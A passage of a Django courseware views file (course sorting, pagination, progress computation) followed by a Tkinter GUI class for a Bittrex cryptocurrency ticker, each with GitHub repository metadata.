    Sort course summary dicts with coursecmp (active, then future, then
    past; ties broken by start_time).

    Uses functools.cmp_to_key instead of the Python-2-only ``cmp=``
    keyword of sorted(); cmp_to_key is available from Python 2.7 onward,
    so this works on both Python 2 and 3.
    """
    from functools import cmp_to_key  # local import keeps top-of-file untouched
    return sorted(response, key=cmp_to_key(coursecmp))
def dateToString(start_date):
    """Return *start_date* formatted as e.g. "05 January" (zero-padded day
    followed by the full month name)."""
    return "{:%d %B}".format(start_date)
def paginated_serializer(request=None, queryset=None, serializer=None, paginate_by=5):
    """
    Serialize one page of *queryset* with *serializer*.

    The page number is taken from the request's query parameters.  A
    non-integer page falls back to the first page; an out-of-range page
    (e.g. 9999) falls back to the last page.  Generic helper usable by
    all views.
    """
    paginator = Paginator(queryset, paginate_by)
    requested_page = request.QUERY_PARAMS.get('page')
    try:
        page_of_items = paginator.page(requested_page)
    except PageNotAnInteger:
        # Non-numeric page parameter -> deliver the first page.
        page_of_items = paginator.page(1)
    except EmptyPage:
        # Page number beyond the last page -> deliver the last page.
        page_of_items = paginator.page(paginator.num_pages)
    return serializer(page_of_items, context={'request': request})
def to_do(request):
    """Stub view: placeholder response until real functionality exists."""
    placeholder = "Functionality to be added"
    return HttpResponse(placeholder)
def instructor_course_list_old(request):
    """
    Deprecated predecessor of instructor_course_list().

    Builds the same per-course summary dicts (serialized course data plus
    "coursetag", "progress" and printable dates), derived from
    CourseInfoSerializer output and sorted via sort_my_courses().

    Fixes over the original: a dead statement that serialized every course
    and immediately discarded the result is removed; the progress
    computation guards against a zero-day duration (ZeroDivisionError);
    the dict merging uses update() so it also works on Python 3.
    """
    histories = CourseHistory.objects.filter(user=request.user, is_owner=True, course__type='O')
    my_courses = [history.course for history in histories]
    my_courses_info = [CourseInfoSerializer(course.course_info).data for course in my_courses]
    current_datetime = timezone.now().date()
    # coursetag: 1 => active, 2 => future, 3 => past.
    coursetag = [{"is_published": element['is_published'],
                  "coursetag": 2 if (element['end_time'] is None or current_datetime < element['start_time'])
                  else 3 if (current_datetime > element['end_time'])
                  else 1}
                 for element in my_courses_info]
    # Printable dates ("Not Decided" when missing).
    start_date = [{"start_date": dateToString(element['start_time']) if element['start_time'] is not None else "Not Decided",
                   "end_date": dateToString(element['end_time']) if element['end_time'] is not None else "Not Decided"}
                  for element in my_courses_info]
    # Progress as percentage of the course duration elapsed; 0 when the
    # duration is unknown or zero days, capped at 100 (matching the
    # original's upper clamp).
    my_courses_progress = []
    for element in my_courses_info:
        if (element['end_time'] is None or element['start_time'] is None
                or (element['end_time'] - element['start_time']).days == 0):
            percent = 0
        else:
            percent = 100.0 * (current_datetime - element['start_time']).days / (element['end_time'] - element['start_time']).days
        my_courses_progress.append({"progress": percent if percent <= 100 else 100})
    my_courses = [CourseSerializer(course).data for course in my_courses]
    # Stringified start/end keep the payload JSON-serializable.
    my_courses_info = [{"start_time": str(element['start_time']), "end_time": str(element['end_time'])}
                       for element in my_courses_info]
    # Merge the pieces; later updates win on key collisions, matching the
    # precedence of the original dict(a.items() + b.items()) expressions.
    response = []
    for i in range(len(my_courses)):
        entry = {}
        entry.update(my_courses_progress[i])
        entry.update(my_courses[i])
        entry.update(coursetag[i])
        entry.update(start_date[i])
        entry.update(my_courses_info[i])
        response.append(entry)
    return sort_my_courses(response)
| {
"content_hash": "5d94888f7a16d9aa30a0e330525e749e",
"timestamp": "",
"source": "github",
"line_count": 498,
"max_line_length": 251,
"avg_line_length": 37.75100401606426,
"alnum_prop": 0.6154255319148936,
"repo_name": "kartikshah1/Test",
"id": "f3825ac7f412bc30934e570b8874c862d446065d",
"size": "18800",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "courseware/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "21691"
},
{
"name": "C++",
"bytes": "3267"
},
{
"name": "CSS",
"bytes": "355299"
},
{
"name": "Java",
"bytes": "9833"
},
{
"name": "JavaScript",
"bytes": "2844415"
},
{
"name": "Perl",
"bytes": "4202"
},
{
"name": "Python",
"bytes": "1703618"
},
{
"name": "Shell",
"bytes": "6379"
}
],
"symlink_target": ""
} |
import tkinter as tk
from time import sleep
from playsound import playsound
import config
import fasttick
from helpmessage import fasttick_help_message
import misc
from tickerwindow import TickerWindow
class GUIfasttick(TickerWindow):
    def __init__(self, app):
        """Build the fast-ticker tab: purge stale pickled history, lay out
        the widgets, and start the once-per-second countdown loop."""
        super().__init__(app)
        # Remove outdated pickle files left over from previous runs.
        misc.delete_ancient_pickles('fasttick_history')
        self.draw_labels()
        self.draw_buttons()
        self.draw_lists()
        self.draw_timer()
        # timer_update() reschedules itself via app.after, so this call
        # kicks off the recurring countdown.
        self.timer_update()
    def draw_labels(self):
        """Place the column header labels (widgets presumably created by the
        TickerWindow base class -- confirm there)."""
        self.labelName.grid(row=3, column=0, sticky='NSWE')
        # This tab shows a rate column instead of the default label text.
        self.labelChange.config(text='Rate')
        self.labelChange.grid(row=3, column=1, sticky='NSWE')
        self.labelVol.grid(row=3, column=2, sticky='NSWE')
        # Spacer/buffer label spanning the right-hand columns.
        self.labelBuf.grid(row=3, rowspan=2, column=3, columnspan=2, sticky='NSWE')
    def draw_buttons(self):
        """Place the sort, notification-bell and help buttons (widgets
        presumably created by the TickerWindow base class -- confirm there)."""
        self.sortByName.grid(row=4, column=0, sticky='NSWE')
        self.sortByChange.grid(row=4, column=1, sticky='NSWE')
        self.sortByVol.grid(row=4, column=2, sticky='NSWE')
        self.notifyBell.grid(row=4, column=3, sticky='NSWE')
        self.help.grid(row=3, column=4, sticky='E')
def on_click_help(self):
helpWindow = tk.Toplevel()
helpWindow.title('Help')
frameBuf = tk.Frame(helpWindow, width=192, bg=config.MAIN_BG)
frameBuf.grid(row=0, rowspan=4, column=0, columnspan=3)
message = tk.Message(frameBuf, bg=config.MAIN_BG, fg=config.TEXT_COLOR,
width=192, text=fasttick_help_message)
message.grid(row=0, columnspan=3)
dismissButton = tk.Button(frameBuf, text='Dismiss', command=helpWindow.destroy)
dismissButton.grid(row=1, column=1)
    def draw_lists(self):
        """Place the scrollbar and the three ticker list columns
        (name, rate, volume)."""
        self.yScroll.grid(row=5, column=3, sticky='NSWE')
        self.listName.grid(row=5, column=0, sticky='NSWE')
        self.listChange.grid(row=5, column=1, sticky='NSWE')
        self.listVol.grid(row=5, column=2, sticky='NSWE')
    def draw_timer(self):
        """Place the countdown widgets and initialise the countdown value."""
        self.timerLabel.grid(row=5, column=4, ipadx=8)
        self.timerFrame.grid(row=5, column=4, columnspan=3)
        self.timerDisp.grid(row=5, column=4)
        # Seconds until the next heartbeat; decremented in timer_update().
        self.timerValue = config.FASTTICK_RATE
def timer_update(self):
if self.timerValue == 3:
self.async = self.pool.apply_async(fasttick.heartbeat)
if self.timerValue == 0:
while True:
if self.async.ready():
break
for i in range(1, 4):
if self.async.ready():
break
self.timerDisp.config(text=f'{"." * i}', font=('', 20))
self.app.update()
sleep(1)
self.ticker_data = self.async.get()
self.sort_ticker()
if self.notifyIsActive and self.ticker_data:
playsound('media/notification_sound.mp3')
self.timerValue = config.FASTTICK_RATE
values = divmod(self.timerValue, 60)
minutes = values[0]
seconds = values[1]
self.timerDisp.config(text=f'{minutes}:{seconds:0>2}', font=('', 20))
self.timerValue -= 1
self.app.after(1000, self.timer_update) | {
"content_hash": "43b5e2be82cab3faa6eff985dde5f0da",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 87,
"avg_line_length": 36.93103448275862,
"alnum_prop": 0.599128540305011,
"repo_name": "JevinJ/Bittrex-Notify",
"id": "a7b178488e1bd5423d91d96fd5e4350b6f445f15",
"size": "3213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/GUIfasttick.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25145"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.